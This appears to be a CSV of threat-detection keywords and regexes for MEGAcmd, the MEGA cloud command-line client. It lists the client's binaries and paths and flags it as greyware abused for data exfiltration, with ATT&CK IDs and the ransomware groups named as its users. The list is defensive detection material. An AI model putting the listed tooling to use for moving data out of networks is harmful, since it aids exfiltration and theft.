"*/MEGAcmd.sh*",".{0,1000}\/MEGAcmd\.sh.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","1","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/MEGAcmdServer.exe*",".{0,1000}\/MEGAcmdServer\.exe.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","1","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/MEGAcmdSetup.exe*",".{0,1000}\/MEGAcmdSetup\.exe.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","1","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/MEGAcmdSetup32.exe*",".{0,1000}\/MEGAcmdSetup32\.exe.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","1","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/MEGAcmdSetup64.exe*",".{0,1000}\/MEGAcmdSetup64\.exe.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","1","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/MEGAcmdSetup64.exe*",".{0,1000}\/MEGAcmdSetup64\.exe.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","1","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/MEGAcmdShell.exe*",".{0,1000}\/MEGAcmdShell\.exe.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","1","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/MEGAcmdUpdater.app*",".{0,1000}\/MEGAcmdUpdater\.app.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/QNAP_NAS/megacmdpkg*",".{0,1000}\/QNAP_NAS\/megacmdpkg.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","1","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/upd/mcmd/MEGAcmd.app*",".{0,1000}\/upd\/mcmd\/MEGAcmd\.app.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-attr*",".{0,1000}\/usr\/bin\/mega\-attr.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-backup*",".{0,1000}\/usr\/bin\/mega\-backup.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-cancel*",".{0,1000}\/usr\/bin\/mega\-cancel.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-cat*",".{0,1000}\/usr\/bin\/mega\-cat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-cd*",".{0,1000}\/usr\/bin\/mega\-cd.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-cmd*",".{0,1000}\/usr\/bin\/mega\-cmd.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-cmd*",".{0,1000}\/usr\/bin\/mega\-cmd.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-cmd-server*",".{0,1000}\/usr\/bin\/mega\-cmd\-server.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-confirm*",".{0,1000}\/usr\/bin\/mega\-confirm.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-confirmcancel*",".{0,1000}\/usr\/bin\/mega\-confirmcancel.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-cp*",".{0,1000}\/usr\/bin\/mega\-cp.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-debug*",".{0,1000}\/usr\/bin\/mega\-debug.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-deleteversions*",".{0,1000}\/usr\/bin\/mega\-deleteversions.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-df*",".{0,1000}\/usr\/bin\/mega\-df.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-du*",".{0,1000}\/usr\/bin\/mega\-du.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-errorcode*",".{0,1000}\/usr\/bin\/mega\-errorcode.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-exclude*",".{0,1000}\/usr\/bin\/mega\-exclude.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-exec*",".{0,1000}\/usr\/bin\/mega\-exec.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-export*",".{0,1000}\/usr\/bin\/mega\-export.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-find*",".{0,1000}\/usr\/bin\/mega\-find.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-ftp*",".{0,1000}\/usr\/bin\/mega\-ftp.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-get*",".{0,1000}\/usr\/bin\/mega\-get.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-graphics*",".{0,1000}\/usr\/bin\/mega\-graphics.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-help*",".{0,1000}\/usr\/bin\/mega\-help.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-https*",".{0,1000}\/usr\/bin\/mega\-https.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-import*",".{0,1000}\/usr\/bin\/mega\-import.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-invite*",".{0,1000}\/usr\/bin\/mega\-invite.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-ipc*",".{0,1000}\/usr\/bin\/mega\-ipc.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-killsession*",".{0,1000}\/usr\/bin\/mega\-killsession.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-lcd*",".{0,1000}\/usr\/bin\/mega\-lcd.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-log*",".{0,1000}\/usr\/bin\/mega\-log.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-login*",".{0,1000}\/usr\/bin\/mega\-login.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-logout*",".{0,1000}\/usr\/bin\/mega\-logout.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-lpwd*",".{0,1000}\/usr\/bin\/mega\-lpwd.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-ls*",".{0,1000}\/usr\/bin\/mega\-ls.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-mediainfo*",".{0,1000}\/usr\/bin\/mega\-mediainfo.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-mkdir*",".{0,1000}\/usr\/bin\/mega\-mkdir.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-mount*",".{0,1000}\/usr\/bin\/mega\-mount.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-mv*",".{0,1000}\/usr\/bin\/mega\-mv.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-passwd*",".{0,1000}\/usr\/bin\/mega\-passwd.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-permissions*",".{0,1000}\/usr\/bin\/mega\-permissions.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-preview*",".{0,1000}\/usr\/bin\/mega\-preview.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
